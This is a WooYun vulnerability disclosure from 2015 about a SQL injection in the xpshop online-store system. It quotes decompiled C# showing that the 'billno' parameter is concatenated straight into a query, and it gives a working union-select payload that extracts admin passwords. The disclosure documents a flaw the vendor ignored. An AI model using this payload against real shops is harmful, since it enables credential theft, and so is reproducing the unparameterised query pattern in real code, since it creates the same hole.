xpshop网店系统sql注入再来一处 | wooyun-2015-0146964

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0146964

漏洞标题：

xpshop网店系统sql注入再来一处

漏洞详情

披露状态：

2015-10-22：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-12-06：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

应该还有几个就收工了，其实还有一些，不过感觉好累不想弄了。再挖多几个就收工了！

详细说明：

漏洞位置xpshop.webui.IspOrderReturnBy：

protected void Page_Load(object sender, EventArgs e)
		{
			base.Response.AddHeader("Pragma", "No-Cache");
			base.Response.Buffer = true;
			base.Response.ExpiresAbsolute = DateTime.Now.AddSeconds(-1.0);
			base.Response.Expires = 0;
			base.Response.CacheControl = "no-cache";
			OrderDB orderDB = new OrderDB();
			int orderID = orderDB.GetOrderID(base.Request["billno"].ToString());
			this.order = orderDB.GetOrderDetails(orderID);

跟进GetOrderID函数：

public int GetOrderID(string orderNo)
		{
			return int.Parse(XpShopDB.ExecuteScalar(XpShopDB.ConnectionString, CommandType.Text, "SELECT OrderID FROM Orders WHERE OrderNo = '" + orderNo + "'", null).ToString());
		}

都是一样没过滤直接进库的。
payload:
/isporderreturnby.aspx?billno=test' union select password from admin--

漏洞证明：

http://localhost/isporderreturnby.aspx?billno=test' union select password from admin--

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源不能忍@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 不能忍@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

版权声明：转载请注明来源不能忍@乌云